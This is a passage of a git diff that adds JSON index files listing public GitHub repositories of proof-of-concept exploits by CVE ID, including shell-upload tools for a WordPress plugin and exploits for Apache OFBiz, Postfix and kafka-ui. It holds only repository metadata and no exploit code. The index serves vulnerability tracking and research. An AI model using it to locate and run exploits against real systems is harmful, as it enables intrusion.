+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 739631896,
+ "name": "CVE-2023-51467-Exploit",
+ "full_name": "JaneMandy\/CVE-2023-51467-Exploit",
+ "owner": {
+ "login": "JaneMandy",
+ "id": 36792635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4",
+ "html_url": "https:\/\/github.com\/JaneMandy"
+ },
+ "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467-Exploit",
+ "description": "Apache Ofbiz CVE-2023-51467 图形化漏洞利用工具",
+ "fork": false,
+ "created_at": "2024-01-06T04:07:07Z",
+ "updated_at": "2024-06-21T00:11:52Z",
+ "pushed_at": "2024-01-06T10:33:34Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 741082767,
+ "name": "cve-2023-51467",
+ "full_name": "vulncheck-oss\/cve-2023-51467",
+ "owner": {
+ "login": "vulncheck-oss",
+ "id": 134310220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4",
+ "html_url": "https:\/\/github.com\/vulncheck-oss"
+ },
+ "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-51467",
+ "description": "A go-exploit for Apache OFBiz CVE-2023-51467",
+ "fork": false,
+ "created_at": "2024-01-09T16:58:06Z",
+ "updated_at": "2024-03-05T09:18:51Z",
+ "pushed_at": "2024-04-10T09:23:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-51467",
+ "go-expliot"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742705000,
+ "name": "BadBizness-CVE-2023-51467",
+ "full_name": "tw0point\/BadBizness-CVE-2023-51467",
+ "owner": {
+ "login": "tw0point",
+ "id": 39099220,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39099220?v=4",
+ "html_url": "https:\/\/github.com\/tw0point"
+ },
+ "html_url": "https:\/\/github.com\/tw0point\/BadBizness-CVE-2023-51467",
+ "description": "Auto exploit script for the Java web framework OF Biz under CVE-2023-51467. ",
+ "fork": false,
+ "created_at": "2024-01-13T05:40:38Z",
+ "updated_at": "2024-01-14T14:17:16Z",
+ "pushed_at": "2024-01-13T06:43:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51518.json b/2023/CVE-2023-51518.json
new file mode 100644
index 0000000000..c0e823f4b4
--- /dev/null
+++ b/2023/CVE-2023-51518.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 809967783,
+ "name": "CVE-2023-51518",
+ "full_name": "mbadanoiu\/CVE-2023-51518",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-51518",
+ "description": "CVE-2023-51518: Preauthenticated Java Deserialization via JMX in Apache James",
+ "fork": false,
+ "created_at": "2024-06-03T19:48:53Z",
+ "updated_at": "2024-06-03T20:13:29Z",
+ "pushed_at": "2024-06-03T20:09:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "cve",
+ "cve-2023-51518",
+ "cves",
+ "deserialization",
+ "local-privilege-escalation",
+ "pre-authentication"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51764.json b/2023/CVE-2023-51764.json
new file mode 100644
index 0000000000..66ff1fd11b
--- /dev/null
+++ b/2023/CVE-2023-51764.json
@@ -0,0 +1,124 @@
+[
+ {
+ "id": 735990437,
+ "name": "CVE-2023-51764",
+ "full_name": "duy-31\/CVE-2023-51764",
+ "owner": {
+ "login": "duy-31",
+ "id": 20819326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4",
+ "html_url": "https:\/\/github.com\/duy-31"
+ },
+ "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-51764",
+ "description": "Postfix SMTP Smuggling - Expect Script POC",
+ "fork": false,
+ "created_at": "2023-12-26T17:02:20Z",
+ "updated_at": "2024-05-06T01:23:15Z",
+ "pushed_at": "2023-12-26T20:16:45Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 736523793,
+ "name": "CVE-2023-51764",
+ "full_name": "eeenvik1\/CVE-2023-51764",
+ "owner": {
+ "login": "eeenvik1",
+ "id": 49790977,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49790977?v=4",
+ "html_url": "https:\/\/github.com\/eeenvik1"
+ },
+ "html_url": "https:\/\/github.com\/eeenvik1\/CVE-2023-51764",
+ "description": "PoC CVE-2023-51764 ",
+ "fork": false,
+ "created_at": "2023-12-28T06:20:13Z",
+ "updated_at": "2024-02-01T06:47:13Z",
+ "pushed_at": "2023-12-28T06:33:39Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737562870,
+ "name": "CVE-2023-51764-POC",
+ "full_name": "d4op\/CVE-2023-51764-POC",
+ "owner": {
+ "login": "d4op",
+ "id": 11721930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11721930?v=4",
+ "html_url": "https:\/\/github.com\/d4op"
+ },
+ "html_url": "https:\/\/github.com\/d4op\/CVE-2023-51764-POC",
+ "description": "just idea, no cp pls",
+ "fork": false,
+ "created_at": "2023-12-31T14:33:26Z",
+ "updated_at": "2024-01-25T21:28:13Z",
+ "pushed_at": "2024-01-03T21:47:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 739273926,
+ "name": "CVE-2023-51764",
+ "full_name": "Double-q1015\/CVE-2023-51764",
+ "owner": {
+ "login": "Double-q1015",
+ "id": 77765134,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77765134?v=4",
+ "html_url": "https:\/\/github.com\/Double-q1015"
+ },
+ "html_url": "https:\/\/github.com\/Double-q1015\/CVE-2023-51764",
+ "description": "CVE-2023-51764 poc",
+ "fork": false,
+ "created_at": "2024-01-05T07:07:47Z",
+ "updated_at": "2024-01-05T07:12:42Z",
+ "pushed_at": "2024-01-05T07:12:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5178.json b/2023/CVE-2023-5178.json
new file mode 100644
index 0000000000..dc0bde4c86
--- /dev/null
+++ b/2023/CVE-2023-5178.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753172434,
+ "name": "CVE-2023-5178",
+ "full_name": "rockrid3r\/CVE-2023-5178",
+ "owner": {
+ "login": "rockrid3r",
+ "id": 112623010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112623010?v=4",
+ "html_url": "https:\/\/github.com\/rockrid3r"
+ },
+ "html_url": "https:\/\/github.com\/rockrid3r\/CVE-2023-5178",
+ "description": "Exploit for CVE-2023-5178",
+ "fork": false,
+ "created_at": "2024-02-05T15:58:24Z",
+ "updated_at": "2024-05-24T10:17:06Z",
+ "pushed_at": "2024-05-17T18:39:43Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51800.json b/2023/CVE-2023-51800.json
new file mode 100644
index 0000000000..2114369a3d
--- /dev/null
+++ b/2023/CVE-2023-51800.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742038737,
+ "name": "CVE-2023-51800",
+ "full_name": "geraldoalcantara\/CVE-2023-51800",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51800",
+ "description": "Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.",
+ "fork": false,
+ "created_at": "2024-01-11T16:28:04Z",
+ "updated_at": "2024-02-16T12:23:21Z",
+ "pushed_at": "2024-03-01T11:58:51Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51801.json b/2023/CVE-2023-51801.json
new file mode 100644
index 0000000000..60784b5992
--- /dev/null
+++ b/2023/CVE-2023-51801.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742057874,
+ "name": "CVE-2023-51801",
+ "full_name": "geraldoalcantara\/CVE-2023-51801",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51801",
+ "description": "Simple Student Attendance System v.1.0 - Multiple SQL injection vulnerabilities - student_form.php and class_form.php",
+ "fork": false,
+ "created_at": "2024-01-11T17:14:33Z",
+ "updated_at": "2024-03-01T12:02:08Z",
+ "pushed_at": "2024-03-01T11:59:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51802.json b/2023/CVE-2023-51802.json
new file mode 100644
index 0000000000..15495fe7b1
--- /dev/null
+++ b/2023/CVE-2023-51802.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 742063325,
+ "name": "CVE-2023-51802",
+ "full_name": "geraldoalcantara\/CVE-2023-51802",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51802",
+ "description": "Simple Student Attendance System v.1.0 - Cross-site scripting (XSS) vulnerabilities in attendance_report",
+ "fork": false,
+ "created_at": "2024-01-11T17:28:16Z",
+ "updated_at": "2024-02-16T12:23:23Z",
+ "pushed_at": "2024-03-01T12:00:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51810.json b/2023/CVE-2023-51810.json
new file mode 100644
index 0000000000..34125eb39b
--- /dev/null
+++ b/2023/CVE-2023-51810.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 741587636,
+ "name": "CVE-2023-51810",
+ "full_name": "Pastea\/CVE-2023-51810",
+ "owner": {
+ "login": "Pastea",
+ "id": 24623933,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4",
+ "html_url": "https:\/\/github.com\/Pastea"
+ },
+ "html_url": "https:\/\/github.com\/Pastea\/CVE-2023-51810",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-10T17:47:54Z",
+ "updated_at": "2024-01-11T18:15:29Z",
+ "pushed_at": "2024-01-15T15:08:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5204.json b/2023/CVE-2023-5204.json
new file mode 100644
index 0000000000..74bac6db4d
--- /dev/null
+++ b/2023/CVE-2023-5204.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 761333708,
+ "name": "CVE-2023-5204",
+ "full_name": "RandomRobbieBF\/CVE-2023-5204",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5204",
+ "description": "AI ChatBot <= 4.8.9 - Unauthenticated SQL Injection via qc_wpbo_search_response",
+ "fork": false,
+ "created_at": "2024-02-21T17:14:15Z",
+ "updated_at": "2024-02-25T05:08:40Z",
+ "pushed_at": "2024-02-21T17:15:25Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-52160.json b/2023/CVE-2023-52160.json
new file mode 100644
index 0000000000..59eee98f1d
--- /dev/null
+++ b/2023/CVE-2023-52160.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 763514094,
+ "name": "eap_pwn",
+ "full_name": "Helica-core\/eap_pwn",
+ "owner": {
+ "login": "Helica-core",
+ "id": 8072457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8072457?v=4",
+ "html_url": "https:\/\/github.com\/Helica-core"
+ },
+ "html_url": "https:\/\/github.com\/Helica-core\/eap_pwn",
+ "description": "poc of CVE-2023-52160",
+ "fork": false,
+ "created_at": "2024-02-26T12:48:07Z",
+ "updated_at": "2024-03-02T03:36:29Z",
+ "pushed_at": "2024-02-26T12:51:54Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5217.json b/2023/CVE-2023-5217.json
new file mode 100644
index 0000000000..32f9a50d76
--- /dev/null
+++ b/2023/CVE-2023-5217.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 701187998,
+ "name": "cve-2023-5217-poc",
+ "full_name": "UT-Security\/cve-2023-5217-poc",
+ "owner": {
+ "login": "UT-Security",
+ "id": 142931531,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142931531?v=4",
+ "html_url": "https:\/\/github.com\/UT-Security"
+ },
+ "html_url": "https:\/\/github.com\/UT-Security\/cve-2023-5217-poc",
+ "description": "A PoC to trigger CVE-2023-5217 from the Browser WebCodecs or MediaRecorder interface.",
+ "fork": false,
+ "created_at": "2023-10-06T05:46:16Z",
+ "updated_at": "2024-05-02T04:34:24Z",
+ "pushed_at": "2023-10-11T04:30:03Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 701294663,
+ "name": "platform_external_libvpx_v1.8.0_CVE-2023-5217",
+ "full_name": "Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-06T10:43:38Z",
+ "updated_at": "2023-10-06T10:45:57Z",
+ "pushed_at": "2023-10-06T10:46:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 701301269,
+ "name": "platform_external_libvpx_v1.4.0_CVE-2023-5217",
+ "full_name": "Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-06T11:01:08Z",
+ "updated_at": "2023-10-06T11:04:35Z",
+ "pushed_at": "2023-10-06T11:05:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-52251.json b/2023/CVE-2023-52251.json
new file mode 100644
index 0000000000..79dac6166e
--- /dev/null
+++ b/2023/CVE-2023-52251.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 739727093,
+ "name": "CVE-2023-52251-POC",
+ "full_name": "BobTheShoplifter\/CVE-2023-52251-POC",
+ "owner": {
+ "login": "BobTheShoplifter",
+ "id": 22559547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4",
+ "html_url": "https:\/\/github.com\/BobTheShoplifter"
+ },
+ "html_url": "https:\/\/github.com\/BobTheShoplifter\/CVE-2023-52251-POC",
+ "description": "CVE-2023-52251 There is a Remote Code Execution vulnerability provectus\/kafka-ui.",
+ "fork": false,
+ "created_at": "2024-01-06T11:07:36Z",
+ "updated_at": "2024-06-25T08:40:35Z",
+ "pushed_at": "2024-01-23T19:06:14Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2023-52251",
+ "kafka-ui",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-52654.json b/2023/CVE-2023-52654.json
new file mode 100644
index 0000000000..7e00bc6658
--- /dev/null
+++ b/2023/CVE-2023-52654.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798468145,
+ "name": "CVE-2023-52654",
+ "full_name": "FoxyProxys\/CVE-2023-52654",
+ "owner": {
+ "login": "FoxyProxys",
+ "id": 166161106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4",
+ "html_url": "https:\/\/github.com\/FoxyProxys"
+ },
+ "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2023-52654",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-09T20:53:03Z",
+ "updated_at": "2024-05-09T21:25:58Z",
+ "pushed_at": "2024-05-09T21:25:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5324.json b/2023/CVE-2023-5324.json
new file mode 100644
index 0000000000..8233b7696c
--- /dev/null
+++ b/2023/CVE-2023-5324.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 698743355,
+ "name": "eero-zero-length-ipv6-options-header-dos",
+ "full_name": "nomis\/eero-zero-length-ipv6-options-header-dos",
+ "owner": {
+ "login": "nomis",
+ "id": 70171,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70171?v=4",
+ "html_url": "https:\/\/github.com\/nomis"
+ },
+ "html_url": "https:\/\/github.com\/nomis\/eero-zero-length-ipv6-options-header-dos",
+ "description": "eeroOS Ethernet Interface Denial of Service Vulnerability (CVE-2023-5324)",
+ "fork": false,
+ "created_at": "2023-09-30T20:32:51Z",
+ "updated_at": "2023-10-01T08:04:08Z",
+ "pushed_at": "2023-10-01T08:03:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5360.json b/2023/CVE-2023-5360.json
new file mode 100644
index 0000000000..cd0e3a58af
--- /dev/null
+++ b/2023/CVE-2023-5360.json
@@ -0,0 +1,287 @@
+[
+ {
+ "id": 708041487,
+ "name": "CVE-2023-5360",
+ "full_name": "sagsooz\/CVE-2023-5360",
+ "owner": {
+ "login": "sagsooz",
+ "id": 38169010,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38169010?v=4",
+ "html_url": "https:\/\/github.com\/sagsooz"
+ },
+ "html_url": "https:\/\/github.com\/sagsooz\/CVE-2023-5360",
+ "description": "CVE-2023-5360 Auto Shell Upload WordPress Royal Elementor 1.3.78 Shell Upload",
+ "fork": false,
+ "created_at": "2023-10-21T10:51:08Z",
+ "updated_at": "2024-03-24T19:49:12Z",
+ "pushed_at": "2023-10-21T10:52:37Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710171154,
+ "name": "Worpress-CVE-2023-5360",
+ "full_name": "phankz\/Worpress-CVE-2023-5360",
+ "owner": {
+ "login": "phankz",
+ "id": 137556272,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137556272?v=4",
+ "html_url": "https:\/\/github.com\/phankz"
+ },
+ "html_url": "https:\/\/github.com\/phankz\/Worpress-CVE-2023-5360",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T06:56:48Z",
+ "updated_at": "2024-06-15T10:37:46Z",
+ "pushed_at": "2023-11-30T07:36:57Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710202087,
+ "name": "CVE-2023-5360",
+ "full_name": "nastar-id\/CVE-2023-5360",
+ "owner": {
+ "login": "nastar-id",
+ "id": 57721604,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4",
+ "html_url": "https:\/\/github.com\/nastar-id"
+ },
+ "html_url": "https:\/\/github.com\/nastar-id\/CVE-2023-5360",
+ "description": "CVE-2023-5360",
+ "fork": false,
+ "created_at": "2023-10-26T08:18:43Z",
+ "updated_at": "2023-10-26T08:19:55Z",
+ "pushed_at": "2023-10-26T08:26:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713201054,
+ "name": "CVE-2023-5360",
+ "full_name": "Chocapikk\/CVE-2023-5360",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-5360",
+ "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.",
+ "fork": false,
+ "created_at": "2023-11-02T03:15:44Z",
+ "updated_at": "2024-04-26T05:16:30Z",
+ "pushed_at": "2023-11-02T17:57:55Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-5360",
+ "exploit",
+ "hacking",
+ "infosec",
+ "open-source",
+ "penetration-testing",
+ "python",
+ "remote-code-execution",
+ "royal-elementor-addons",
+ "vulnerability",
+ "web-security",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 713204555,
+ "name": "CVE-2023-5360",
+ "full_name": "tucommenceapousser\/CVE-2023-5360",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-5360",
+ "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.",
+ "fork": false,
+ "created_at": "2023-11-02T03:28:59Z",
+ "updated_at": "2024-05-26T21:10:38Z",
+ "pushed_at": "2023-11-10T07:15:16Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 713655566,
+ "name": "WP-CVE-2023-5360",
+ "full_name": "Jenderal92\/WP-CVE-2023-5360",
+ "owner": {
+ "login": "Jenderal92",
+ "id": 59664965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4",
+ "html_url": "https:\/\/github.com\/Jenderal92"
+ },
+ "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-5360",
+ "description": "Python 2.7",
+ "fork": false,
+ "created_at": "2023-11-03T00:58:36Z",
+ "updated_at": "2024-06-14T13:38:32Z",
